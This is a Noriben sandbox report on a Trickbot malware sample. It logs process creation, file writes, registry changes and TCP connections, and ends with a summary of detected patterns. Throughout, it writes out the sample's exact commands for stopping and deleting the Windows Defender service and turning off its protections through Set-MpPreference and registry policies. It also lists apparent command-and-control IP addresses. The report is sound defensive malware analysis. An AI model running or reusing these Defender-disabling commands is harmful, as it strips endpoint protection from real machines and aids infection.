-=] Sandbox Analysis Report generated by Noriben v1.8.3
-=] Developed by Brian Baskin: brian @@ thebaskins.com  @bbaskin
-=] The latest release can be found at https://github.com/Rurik/Noriben

-=] Execution time: 655.86 seconds
-=] Processing time: 27.80 seconds
-=] Analysis time: 20.89 seconds

Processes Created:
==================
[CreateProcess] Explorer.EXE:6580 > "%UserProfile%\Downloads\set2_trickbot\VirusShare_6494619295970a32aa5eabfcd0381928\9996c514e96ee7ba8b3a02e137e87e2f95f7227998afd98fa64ace9b8dba4cdb.exe"	[Child PID: 4048]
[CreateProcess] 9996c514e96ee7ba8b3a02e137e87e2f95f7227998afd98fa64ace9b8dba4cdb.exe:4048 > "%AllUsersProfile%\Опраяццх.exe "	[Child PID: 9796
[CreateProcess] Опраяццх.exe:9796 > "C:\Windows\System32\cmd.exe /c sc stop WinDefend"	[Child PID: 9892]
[CreateProcess] Опраяццх.exe:9796 > "C:\Windows\System32\cmd.exe /c sc delete WinDefend"	[Child PID: 9936]
[CreateProcess] Опраяццх.exe:9796 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"	[Child PID: 9964]
[CreateProcess] Опраяццх.exe:9796 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableBehaviorMonitoring $true"	[Child PID: 10024]
[CreateProcess] Опраяццх.exe:9796 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true"	[Child PID: 10060]
[CreateProcess] Опраяццх.exe:9796 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true"	[Child PID: 10076]
[CreateProcess] Опраяццх.exe:9796 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisablePrivacyMode $true"	[Child PID: 10136]
[CreateProcess] Опраяццх.exe:9796 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true"	[Child PID: 10192]
[CreateProcess] Опраяццх.exe:9796 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -SevereThreatDefaultAction 6"	[Child PID: 7536]
[CreateProcess] Опраяццх.exe:9796 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -LowThreatDefaultAction 6"	[Child PID: 9232]
[CreateProcess] Опраяццх.exe:9796 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -ModerateThreatDefaultAction 6"	[Child PID: 9368]
[CreateProcess] Опраяццх.exe:9796 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableScriptScanning $true"	[Child PID: 9536]
[CreateProcess] Опраяццх.exe:9796 > "%WinDir%\system32\svchost.exe"	[Child PID: 10384]
[CreateProcess] Опраяццх.exe:116 > "C:\Windows\System32\cmd.exe /c sc stop WinDefend"	[Child PID: 2780]
[CreateProcess] Опраяццх.exe:116 > "C:\Windows\System32\cmd.exe /c sc delete WinDefend"	[Child PID: 7344]
[CreateProcess] Опраяццх.exe:116 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"	[Child PID: 8560]
[CreateProcess] Опраяццх.exe:116 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableBehaviorMonitoring $true"	[Child PID: 2428]
[CreateProcess] Опраяццх.exe:116 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true"	[Child PID: 8776]
[CreateProcess] Опраяццх.exe:116 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true"	[Child PID: 6760]
[CreateProcess] Опраяццх.exe:116 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisablePrivacyMode $true"	[Child PID: 11232]
[CreateProcess] Опраяццх.exe:116 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true"	[Child PID: 11152]
[CreateProcess] Опраяццх.exe:116 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -SevereThreatDefaultAction 6"	[Child PID: 7940]
[CreateProcess] Опраяццх.exe:116 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -LowThreatDefaultAction 6"	[Child PID: 9016]
[CreateProcess] Опраяццх.exe:116 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -ModerateThreatDefaultAction 6"	[Child PID: 11256]
[CreateProcess] Опраяццх.exe:116 > "C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableScriptScanning $true"	[Child PID: 6224]
[CreateProcess] Опраяццх.exe:116 > "%WinDir%\system32\svchost.exe"	[Child PID: 4328]

File Activity:
==================
[WriteFile] 9996c514e96ee7ba8b3a02e137e87e2f95f7227998afd98fa64ace9b8dba4cdb.exe:4048 > %AllUsersProfile%\Опраяццх.exe	[SHA256: 9996c514e96ee7ba8b3a02e137e87e2f95f7227998afd98fa64ace9b8dba4cdb]
[WriteFile] Опраяццх.exe:8768 > %AppData%\Microsoft\Crypto\RSA\S-1-5-21-2259584852-2365352558-1469986205-500\6eed64232fa4692a5af67a770cac6adb_a8bbd5d6-f8a0-4740-989a-7a13ffdd125f	[SHA256: ccb4a3301ec45a7925ba220b3b3bd97a7a6f4b066ce39e005ed089f10c667f02]
[WriteFile] Опраяццх.exe:9796 > %AppData%\Microsoft\Crypto\RSA\S-1-5-21-2259584852-2365352558-1469986205-500\6eed64232fa4692a5af67a770cac6adb_a8bbd5d6-f8a0-4740-989a-7a13ffdd125f	[SHA256: ccb4a3301ec45a7925ba220b3b3bd97a7a6f4b066ce39e005ed089f10c667f02]
[WriteFile] svchost.exe:10384 > %AppData%\newmslib\Опраяццх.exe	[SHA256: 9996c514e96ee7ba8b3a02e137e87e2f95f7227998afd98fa64ace9b8dba4cdb]
[WriteFile] Опраяццх.exe:116 > %AllUsersProfile%\Microsoft\Crypto\RSA\S-1-5-18\07db97793e5791361637c7fd93a8fcc0_a8bbd5d6-f8a0-4740-989a-7a13ffdd125f	[File no longer exists]

Registry Activity:
==================
[RegSetValue] 9996c514e96ee7ba8b3a02e137e87e2f95f7227998afd98fa64ace9b8dba4cdb.exe:4048 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass  =  1
[RegSetValue] Опраяццх.exe:9796 > HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware  =  1
[RegSetValue] Опраяццх.exe:9796 > HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring  =  1
[RegSetValue] Опраяццх.exe:9796 > HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable  =  1
[RegSetValue] Опраяццх.exe:9796 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass  =  1
[RegSetValue] Опраяццх.exe:116 > HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware  =  1
[RegSetValue] Опраяццх.exe:116 > HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring  =  1
[RegSetValue] Опраяццх.exe:116 > HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass  =  1

Network Traffic:
==================
[TCP] svchost.exe:4328 > 185.65.202.127:443
[TCP] svchost.exe:4328 > 37.18.30.153:443
[TCP] svchost.exe:4328 > 81.177.26.91:443
[TCP] svchost.exe:4328 > 162.248.225.20:443
[TCP] svchost.exe:4328 > 172.245.110.126:443

Unique Hosts:
==================
162.248.225.20
172.245.110.126
185.65.202.127
37.18.30.153
81.177.26.91

Analysis:
==================
42 Trickbot pattern(s) found:
(4) Launches command to delete or stop Windows Defender
(20) Uses Powershell Set-MpPreference command to change antivirus preferences
(2) Creates svchost.exe process
(1) Writes to executable file in %AllUsersProfile%
(3) Writes to file in ...\Microsoft\Crypto\RSA\<SID> folder
(1) Writes to executable file in subfolder of %AppData% folder
(5) Changes Windows Defender registry settings
(1) Sets registry subkey in HKU\.DEFAULT to bypass proxy settings
(5) svchost.exe launches TCP connection on port 443 (HTTPS)